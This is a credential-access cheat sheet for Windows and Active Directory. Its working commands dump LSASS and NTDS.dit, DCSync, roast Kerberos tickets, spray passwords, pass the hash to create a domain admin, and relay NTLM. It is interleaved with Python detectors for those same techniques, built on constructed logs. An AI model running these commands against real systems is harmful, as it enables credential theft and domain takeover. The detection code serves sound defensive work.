Credential Access

The adversary is trying to steal account names and passwords. https://attack.mitre.org/tactics/TA0006/

SecureString to Plaintext

$SecPass = "<SECURE PASS STRING>" | ConvertTo-SecureString;
(New-Object System.Management.Automation.PSCredential "N/A", $SecPass).GetNetworkCredential().Password;

Passwords in Description

ActiveDirectory Module

Get-ADUser -Filter 'Description -like "*password*"' -Properties Description | select name,Description

Using PowerView.ps1 (GitHub: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1):

Find-UserField -SearchField Description -SearchTerm "password"
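The two queries above match only the literal word "password". As an added example, not from the page or from PowerView, the following Python audit runs the same check over a constructed export of user descriptions with a broader set of indicators (pw, pwd, secret, a value after ":" or "=" or "is") and separates "a credential value is present" from "the keyword merely appears", which is what a hygiene review of the Description attribute needs. The sample records are invented; a real run would feed it the rows of a CSV exported from Get-ADUser.

```python
import re

# Constructed sample of user records (the columns you would export with
# Get-ADUser ... | Export-Csv); none of these are real accounts.
SAMPLE_USERS = [
    {"name": "svc_backup", "description": "Backup service. Password: Summer2019!"},
    {"name": "jsmith", "description": "Accounting, ext. 4412"},
    {"name": "printsvc", "description": "pw=Pr1nt3r$ do not change"},
    {"name": "legacyapp", "description": "initial pwd is Welcome1 -- user must change"},
    {"name": "kiosk01", "description": "Lobby kiosk. Contact helpdesk to reset password."},
    {"name": "oracle_db", "description": ""},
]

# Strong indicator: a credential keyword followed by ':' / '=' / 'is' and a value.
CRED_VALUE = re.compile(
    r"\b(pass(?:word|wd|phrase)?|pwd|pw|secret|pin)\b\s*(?:[:=]|is)\s*(\S+)",
    re.IGNORECASE,
)
# Weak indicator: the keyword appears but no value follows; still worth a look.
CRED_KEYWORD = re.compile(r"\b(pass(?:word|wd)?|pwd|pw|secret)\b", re.IGNORECASE)


def classify(description):
    """Return ('value', <captured value>), ('keyword', <word>) or None."""
    text = description or ""
    m = CRED_VALUE.search(text)
    if m:
        return ("value", m.group(2))
    m = CRED_KEYWORD.search(text)
    if m:
        return ("keyword", m.group(1))
    return None


def audit(users):
    """Run classify() over every record and keep only the flagged ones."""
    findings = []
    for user in users:
        verdict = classify(user["description"])
        if verdict is not None:
            findings.append({"name": user["name"], "kind": verdict[0], "hit": verdict[1]})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_USERS):
        print(f"{f['name']:<12} {f['kind']:<8} {f['hit']}")
```

Entries classified as "value" are the ones to rotate immediately; "keyword" hits are usually benign wording ("reset password via helpdesk") but deserve a glance, since any authenticated domain user can read the Description attribute.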

Volume Shadow Creation

Source: https://www.picussecurity.com/resource/blog/t1047-windows-management-instrumentation-of-the-mitre-attack-framework

# creating volume shadow copy
wmic /node:"[AD_IP_address]" /user:"[username]" /password:"[password]" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"

# copying NTDS.dit, SYSTEM and SECURITY files from shadow copy
wmic /node:"[AD_IP_address]" /user:"[username]" /password:"[password]" process call create "cmd /c copy \[shadow_copy_dir]\Windows\NTDS\NTDS.dit [target_folder] & copy \[shadow_copy_dir]\Windows\System32\config\SYSTEM [target_folder] & copy \[shadow_copy_dir]\Windows\System32\config\SECURITY [target_folder]"

# compressing files for exfiltration
7za.exe a -mx3 nt.7z \\[AD_IP_address]\c$\[target_folder]

Stored Credential Enumeration

You can use the cmdkey command or keymgr.dll (requires a GUI session) to list stored credentials. A saved credential can then be used with runas to authenticate.

Listing saved credentials:

cmdkey /list

Listing saved credentials in a desktop environment:

rundll32.exe keymgr.dll, KRShowKeyMgr

Using saved credentials:

runas /savecred /user:jmith cmd.exe

Dumping LSASS with rundll32.exe

This produces the same result as right-clicking the lsass.exe process in Task Manager and creating a dump file manually. The numeric argument (624 in the example below) is the PID of lsass.exe.

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full

Memory Dump with Get-StorageDiagnosticInfo

Sources: https://x.com/0gtweet/status/1440255495797764108 and https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2019-ps

# -ExpandProperty yields the name as a plain string; -Property would pass a wrapper object to the next cmdlet
$fname = Get-StorageSubSystem | Select -ExpandProperty FriendlyName
Get-StorageDiagnosticInfo -StorageSubSystemFriendlyName $fname -IncludeLiveDump -DestinationPath C:\

Mount VHD, pull SAM

guestmount --add GoldenWindows11x64.vhdx --inspector --ro -v /mnt
cd /mnt/Windows/System32/config
cp SAM SYSTEM /root && cd /root && guestunmount /mnt
secretsdump.py -sam /root/SAM -system /root/SYSTEM local

Targeted Kerberoasting with PowerSploit

Get-DomainUser 'victimuser' | Select serviceprincipalname
Set-DomainObject -Identity 'victimuser' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}

# Obtain a kerberoast hash to crack
$User = Get-DomainUser 'victimuser'
$User | Get-DomainSPNTicket | fl

# Clear the SPNs of the target account
$User | Select serviceprincipalname
Set-DomainObject -Identity victimuser -Clear serviceprincipalname

Dumping NTDS with ntdsutil.exe

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

DSInternals

DSInternals is available at: https://github.com/MichaelGrafnetter/DSInternals

DCSync with Get-ADReplAccount

Credit to @Mastadon.

Get-ADReplAccount -Server <DC FQDN> -All | Where { $_.Enabled -eq $True} | Format-Custom -View PwDump | tee hashes.ntds ; if($?) {cat .\hashes.ntds | select-string -NotMatch '\$', '\$DUPLICATE', 'IWAM_', 'IUSR_', 'ASPNET', 'HelpAssistant', 'SUPPORT_', 'Guest', 'DefaultAccount', 'HealthMailbox' |%{$_.Line.Trim()} | ? {$_.Trim() -ne "" }| Sort | Get-Unique | Out-File -encoding ASCII hashes_sorted.txt}

Extracting from NTDS, SYSTEM, SECURITY

You may have to modify the following registry key:

  • HKLM\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy and set "Enabled" to 0

Install-Module DSInternals;
Import-Module DSInternals;

$key = Get-BootKey -SystemHivePath '.\registry\SYSTEM';
Get-ADDBAccount -DistinguishedName 'CN=krbtgt,CN=Users,DC=burmat,DC=local' -DBPath '.\Active Directory\ntds.dit' -BootKey $key;

Extracting NTDS with ntdsutil.exe

C:\> ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
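Every command in this section, and in the LSASS, shadow-copy and live-dump sections above, leaves a process-creation record (Security 4688 with command-line auditing enabled, or Sysmon event 1). The following Python detector is an added example, not from the page or from any of the tools it lists: it runs a small rule set over constructed, pipe-delimited process-creation lines (timestamp|host|user|image|commandline, a layout assumed for the example) and reports which technique each line matches: comsvcs.dll MiniDump, ntdsutil ifm export, vssadmin shadow creation, a copy out of a HarddiskVolumeShadowCopy path, Get-StorageDiagnosticInfo -IncludeLiveDump, and runas /savecred. The rule names are this example's own labels.

```python
import re

# Detection rules: every regex in the list must match the command line
# (case-insensitive). Names are this example's own labels, not a vendor's.
RULES = [
    ("lsass_minidump_comsvcs", [r"comsvcs\.dll", r"\bMiniDump\b"]),
    ("ntdsutil_ifm_export", [r"\bntdsutil\b", r"\bifm\b|\bcreate\s+full\b"]),
    ("vss_shadow_creation", [r"\bvssadmin\b", r"\bcreate\s+shadow\b"]),
    ("copy_from_shadow_copy", [r"HarddiskVolumeShadowCopy\d+",
                               r"\\(?:NTDS\.dit|SAM|SYSTEM|SECURITY)\b"]),
    ("storage_live_dump", [r"Get-StorageDiagnosticInfo", r"-IncludeLiveDump\b"]),
    ("runas_savecred", [r"\brunas\b", r"/savecred\b"]),
]

# Constructed process-creation records (not real telemetry) in an assumed layout:
# timestamp|host|user|image|commandline   (one event per line)
SAMPLE_LOG = r"""
2024-05-02T09:12:01|WS01|CORP\jsmith|C:\Windows\System32\rundll32.exe|rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full
2024-05-02T09:12:40|DC01|CORP\svc_backup|C:\Windows\System32\ntdsutil.exe|ntdsutil.exe "ac i ntds" "ifm" "create full c:\temp" q q
2024-05-02T09:13:05|DC01|CORP\svc_backup|C:\Windows\System32\vssadmin.exe|vssadmin create shadow /for=C:
2024-05-02T09:13:20|DC01|CORP\svc_backup|C:\Windows\System32\cmd.exe|cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp
2024-05-02T09:15:00|WS02|CORP\akim|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\akim\notes.txt
2024-05-02T09:16:30|WS01|CORP\jsmith|C:\Windows\System32\runas.exe|runas /savecred /user:jsmith cmd.exe
2024-05-02T09:17:10|SRV03|CORP\ops|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Get-StorageDiagnosticInfo -StorageSubSystemFriendlyName "Storage Spaces on SRV03" -IncludeLiveDump -DestinationPath C:\dumps
"""


def parse_line(line):
    """Split one record; the command line may itself contain '|' so split at most 4 times."""
    ts, host, user, image, cmdline = line.split("|", 4)
    return {"ts": ts, "host": host, "user": user, "image": image, "cmdline": cmdline}


def match_rules(cmdline):
    """Names of all rules whose patterns all match the command line."""
    return [name for name, patterns in RULES
            if all(re.search(p, cmdline, re.IGNORECASE) for p in patterns)]


def detect(log_text):
    """Run every rule over every record and return one alert per (record, rule) hit."""
    alerts = []
    for line in log_text.strip().splitlines():
        ev = parse_line(line)
        for rule in match_rules(ev["cmdline"]):
            alerts.append({"rule": rule, "ts": ev["ts"], "host": ev["host"], "user": ev["user"]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"{a['ts']} {a['host']:<6} {a['user']:<18} {a['rule']}")
```

The notepad line is there as a negative case. On a real estate the ntdsutil and vssadmin rules need an allowlist for scheduled backup jobs on DCs, but a MiniDump of LSASS via comsvcs.dll and a runas /savecred have no routine business use and can alert unconditionally.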

Impacket

GetUserSPNs.py

Kerberoasting

GetUserSPNs.py -request -dc-ip 10.10.10.123 burmat.local/xsvc:S3cur3PW123

GetNPUsers.py

AS-REP Roasting - Attempt to get TGTs for users that have UF_DONT_REQUIRE_PREAUTH set:

GetNPUsers.py -request -no-pass -dc-ip 10.10.10.123 burmat.local/ -usersfile users.txt
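Both roasting variants on this page, and the targeted Kerberoasting sequence in the PowerSploit section above (SPN set, TGS requested, SPN cleared), are visible in domain controller Security logs: 5136 for the servicePrincipalName change, 4769 for the TGS request with its ticket encryption type, and 4768 with Pre-Authentication Type 0 for an account that does not require pre-authentication. The following Python correlation is an added example, not from the page or from Impacket or PowerSploit; the event dicts are constructed to mirror the page's scenario, the field names only loosely follow the Windows event data, and the 30-minute correlation window is an assumed tuning value.

```python
from datetime import datetime, timedelta

RC4_HMAC = 0x17                               # ticket etype classic roasting tools request
CORRELATION_WINDOW = timedelta(minutes=30)    # assumed: max gap between SPN add and TGS request

# Constructed DC Security-log events mirroring the page's scenario (not real telemetry).
SAMPLE_EVENTS = [
    {"id": 5136, "time": "2024-05-02T10:00:00", "subject": "CORP\\jsmith",
     "object": "CN=victimuser,CN=Users,DC=burmat,DC=local", "class": "user",
     "attribute": "servicePrincipalName", "op": "add", "value": "nonexistent/BLAHBLAH"},
    {"id": 4769, "time": "2024-05-02T10:01:10", "account": "jsmith@BURMAT.LOCAL",
     "service": "victimuser", "etype": 0x17, "source_ip": "10.10.1.141"},
    {"id": 5136, "time": "2024-05-02T10:02:00", "subject": "CORP\\jsmith",
     "object": "CN=victimuser,CN=Users,DC=burmat,DC=local", "class": "user",
     "attribute": "servicePrincipalName", "op": "delete", "value": "nonexistent/BLAHBLAH"},
    {"id": 4769, "time": "2024-05-02T10:05:00", "account": "jsmith@BURMAT.LOCAL",
     "service": "xsvc", "etype": 0x17, "source_ip": "10.10.1.141"},
    {"id": 4769, "time": "2024-05-02T10:05:30", "account": "akim@BURMAT.LOCAL",
     "service": "FS01$", "etype": 0x12, "source_ip": "10.10.2.7"},
    {"id": 4768, "time": "2024-05-02T10:06:00", "account": "legacysvc",
     "preauth_type": 0, "etype": 0x17, "source_ip": "10.10.1.141"},
    {"id": 4768, "time": "2024-05-02T10:06:05", "account": "akim",
     "preauth_type": 2, "etype": 0x12, "source_ip": "10.10.2.7"},
]


def cn_from_dn(dn):
    """'CN=victimuser,CN=Users,DC=burmat,DC=local' -> 'victimuser'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def detect_roasting(events):
    findings = []
    spn_adds = []   # (time, account cn, who changed it) from 5136 SPN adds on user objects
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["id"] == 5136 and ev["class"] == "user" \
                and ev["attribute"].lower() == "serviceprincipalname":
            cn = cn_from_dn(ev["object"]).lower()
            if ev["op"] == "add":
                spn_adds.append((t, cn, ev["subject"]))
            else:   # removing the SPN again is the cleanup step of the targeted sequence
                for f in findings:
                    if f["rule"] == "targeted_kerberoast" and f["service"].lower() == cn:
                        f["spn_cleared_at"] = ev["time"]
        elif ev["id"] == 4769:
            svc = ev["service"]
            # Computer accounts, krbtgt and AES tickets are ordinary domain traffic.
            if svc.endswith("$") or svc.lower() == "krbtgt" or ev["etype"] != RC4_HMAC:
                continue
            finding = {"rule": "kerberoast_rc4_tgs", "time": ev["time"], "account": ev["account"],
                       "service": svc, "source_ip": ev["source_ip"]}
            # Escalate when the SPN was added to a user object shortly before the request.
            for add_time, cn, subject in spn_adds:
                if cn == svc.lower() and timedelta(0) <= t - add_time <= CORRELATION_WINDOW:
                    finding["rule"] = "targeted_kerberoast"
                    finding["spn_added_by"] = subject
            findings.append(finding)
        elif ev["id"] == 4768 and ev["preauth_type"] == 0:
            # Pre-Authentication Type 0 means the account has UF_DONT_REQUIRE_PREAUTH set.
            findings.append({"rule": "asrep_roast_no_preauth", "time": ev["time"],
                             "account": ev["account"], "etype": ev["etype"],
                             "source_ip": ev["source_ip"]})
    return findings


if __name__ == "__main__":
    for f in detect_roasting(SAMPLE_EVENTS):
        print(f)
```

A plain RC4 TGS request for a user-account SPN is a low-fidelity signal on its own (legacy clients still request RC4); the SPN-added-then-requested-then-removed chain is what makes the targeted case unambiguous, and the 4768 rule is best used as an inventory of accounts to fix rather than as a per-event alert.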

secretsdump.py

Using secretsdump.py to extract credentials, either remotely from a DC or from offline hive and database files.

Extracting Credentials Remotely

secretsdump.py -just-dc-ntlm burmat.local/administrator@10.10.10.123

Offline NTDS Cracking

secretsdump.py -ntds ./ntds.dit -system SYSTEM LOCAL -output dump.ntds -user-status

Resetting Credentials with smbpasswd.py

Reset a password when you have valid credentials but the password has expired. Also useful when you have an NT hash and no plaintext password.

smbpasswd -r 10.0.0.12 -U 'burmat'

NetExec

GitHub repo: https://github.com/Pennyw0rth/NetExec

Pass-the-Hash

Because hashes are just as good:

# create a user
nxc smb 10.10.10.123 -u 'administrator' -d 'burmat.local' -H 'd7452863d1e8e15241nn50ceb1ab9dfe' -x 'net user burmat Pwn3dPwn3d! /add /domain'

# add to domain admins
nxc smb 10.10.10.123 -u 'administrator' -d 'burmat.local' -H 'd7452863d1e8e15241nn50ceb1ab9dfe' -x 'net group "Domain Admins" /add burmat /domain'

SMB Password Spraying

Switch out usernames/passwords/targets with lists:

## spray the password Spring2024! with a list of users against a list of targets:
nxc smb 'targets.txt' -u 'users.txt' -p 'Spring2024!' -d 'burmat.local'
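A spray from one source shows up in the DC and target Security logs as 4625 failures spread across many accounts within a short window, rather than many failures against one account. The detector below is an added example (not from the page or from NetExec) that works over constructed 4625/4624 lines in an assumed "time|event_id|source_ip|target_user|status" layout; the ten-minute window and five-user threshold are assumed tuning values. It also reports which accounts then logged on successfully from the same source inside the window, which is what an incident responder needs first.

```python
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)      # assumed tuning value
MIN_DISTINCT_USERS = 5              # assumed tuning value

# Constructed logon events (not real telemetry) in an assumed layout:
# time|event_id|source_ip|target_user|status   (4625 = failure, 4624 = success)
SAMPLE_LOGONS = """
2024-05-02T08:00:01|4625|10.10.1.141|jsmith|0xC000006A
2024-05-02T08:00:02|4625|10.10.1.141|akim|0xC000006A
2024-05-02T08:00:03|4625|10.10.1.141|mlee|0xC000006A
2024-05-02T08:00:04|4625|10.10.1.141|rpatel|0xC000006A
2024-05-02T08:00:05|4625|10.10.1.141|sysadmin|0xC0000064
2024-05-02T08:00:06|4624|10.10.1.141|tnguyen|0x0
2024-05-02T08:03:10|4625|10.10.2.7|akim|0xC000006A
2024-05-02T08:03:25|4625|10.10.2.7|akim|0xC000006A
2024-05-02T08:03:40|4625|10.10.2.7|akim|0xC000006A
2024-05-02T08:04:00|4624|10.10.2.7|akim|0x0
2024-05-02T08:20:00|4625|10.10.3.9|bob|0xC000006A
2024-05-02T08:21:00|4625|10.10.3.9|alice|0xC000006A
"""


def parse_logons(log_text):
    rows = []
    for line in log_text.strip().splitlines():
        ts, eid, src, user, status = line.split("|")
        rows.append({"time": datetime.fromisoformat(ts), "id": int(eid),
                     "src": src, "user": user.lower(), "status": status})
    return rows


def detect_spray(rows, window=WINDOW, min_users=MIN_DISTINCT_USERS):
    failures = defaultdict(list)    # source ip -> [(time, user)]
    successes = defaultdict(list)   # source ip -> [(time, user)]
    for r in sorted(rows, key=lambda r: r["time"]):
        if r["id"] == 4625:
            failures[r["src"]].append((r["time"], r["user"]))
        elif r["id"] == 4624:
            successes[r["src"]].append((r["time"], r["user"]))
    alerts = []
    for src, fails in failures.items():
        # Slide a window over the time-ordered failures; report the first one that trips.
        for i, (t0, _) in enumerate(fails):
            users = {u for t, u in fails[i:] if t - t0 <= window}
            if len(users) >= min_users:
                hits = sorted({u for t, u in successes[src] if t0 <= t <= t0 + window})
                alerts.append({"src": src, "window_start": t0.isoformat(),
                               "distinct_users": len(users), "hits": hits})
                break
    return alerts


if __name__ == "__main__":
    for a in detect_spray(parse_logons(SAMPLE_LOGONS)):
        print(a)
```

The second source (three failures, one account, then success) is a user mistyping a password and must not alert; the third source stays under the threshold. Keying on distinct target users per source, not raw failure count, is what separates a spray from ordinary lockout noise. Status 0xC0000064 (unknown user) from a spraying source is a useful extra signal that the attacker is working from a guessed user list.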

Dumping Remote PowerShell History

nxc smb 10.250.1.33 -u 'dev001' -p 'burmat123$' -d 'burmat.local' -M powershell_history

Extracting Credentials

## mimikatz module
nxc smb 10.10.10.123 -u 'administrator' -d 'burmat.local' -p 'S3cur3PW123' -M mimikatz -o COMMAND='privilege::debug'

## SAM database
nxc smb 10.10.10.123 -u 'administrator' -d 'burmat.local' -p 'S3cur3PW123' --sam

Relaying to DCSync

ntlmrelayx.py -t DCSYNC://172.16.1.200 -smb2support -debug
python3 dementor.py -d burmat.local -u jsmith -p 'S3cur3PASS123$' 10.10.1.141 172.16.1.23 -debug
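Both a DCSync from a tool such as Get-ADReplAccount (DSInternals section above) and a relayed one through ntlmrelayx appear on the DC as Security event 4662 with the replication extended rights listed in Properties; what differs is who holds the right and where the logon came from, and 4662 only exposes the latter through its SubjectLogonId joined to the matching 4624. The following Python check is an added example, not from the page or from DSInternals or Impacket: it flags replication by a non-DC account and replication by a DC computer account whose logon did not originate from that DC's own IP. The DC inventory and the events are constructed for the example; the three extended-right GUIDs are the real Active Directory values.

```python
# Extended-right GUIDs that DRSUAPI replication requires (real AD values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Assumed inventory for the example: DC computer accounts and their IPs (constructed).
DOMAIN_CONTROLLERS = {"DC01$": "10.10.10.123", "DC02$": "10.10.10.124"}
# Non-DC accounts that legitimately replicate (e.g. a directory sync service); none here.
REPLICATION_ALLOWLIST = set()

# Constructed Security events from a DC (not real telemetry). 4624 carries the source IP
# of a logon; 4662 carries the logon id (SubjectLogonId) and the properties accessed.
SAMPLE_EVENTS = [
    {"id": 4624, "logon_id": "0x3e7a1", "account": "DC02$", "ip": "10.10.10.124"},
    {"id": 4662, "logon_id": "0x3e7a1", "subject": "DC02$",
     "properties": ["{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},          # normal replication
    {"id": 4624, "logon_id": "0x4b2c9", "account": "administrator", "ip": "10.10.1.141"},
    {"id": 4662, "logon_id": "0x4b2c9", "subject": "administrator",
     "properties": ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
                    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},          # classic DCSync
    {"id": 4624, "logon_id": "0x5d310", "account": "DC01$", "ip": "10.10.1.141"},
    {"id": 4662, "logon_id": "0x5d310", "subject": "DC01$",
     "properties": ["{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},          # relayed DC account
    {"id": 4624, "logon_id": "0x6e4f2", "account": "jsmith", "ip": "10.10.2.7"},
    {"id": 4662, "logon_id": "0x6e4f2", "subject": "jsmith",
     "properties": ["{e1f2a3b4-0000-4000-8000-000000000001}"]},          # constructed, not a replication right
]


def normalize_guid(g):
    return g.strip("{}").lower()


def detect_dcsync(events, dcs=DOMAIN_CONTROLLERS, allowlist=REPLICATION_ALLOWLIST):
    # Join: logon id -> source IP, from the 4624 events.
    logon_ip = {ev["logon_id"]: ev["ip"] for ev in events if ev["id"] == 4624}
    findings = []
    for ev in events:
        if ev["id"] != 4662:
            continue
        rights = [REPLICATION_RIGHTS[g] for g in map(normalize_guid, ev["properties"])
                  if g in REPLICATION_RIGHTS]
        if not rights:
            continue
        subject = ev["subject"]
        src_ip = logon_ip.get(ev["logon_id"], "unknown")
        reason = None
        if subject in dcs:
            if src_ip != dcs[subject]:
                reason = "dc_account_replicating_from_non_dc_ip"   # relay or stolen machine account
        elif subject not in allowlist:
            reason = "non_dc_account_replicating"                   # classic DCSync
        if reason:
            findings.append({"reason": reason, "subject": subject, "source_ip": src_ip,
                             "rights": rights, "logon_id": ev["logon_id"]})
    return findings


if __name__ == "__main__":
    for f in detect_dcsync(SAMPLE_EVENTS):
        print(f)
```

Auditing 4662 for these GUIDs requires a SACL on the domain naming context for the replication rights; without it the events are never written. Keeping the DC inventory current matters more than the rule logic, because a stale list turns every newly promoted DC into a false positive.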
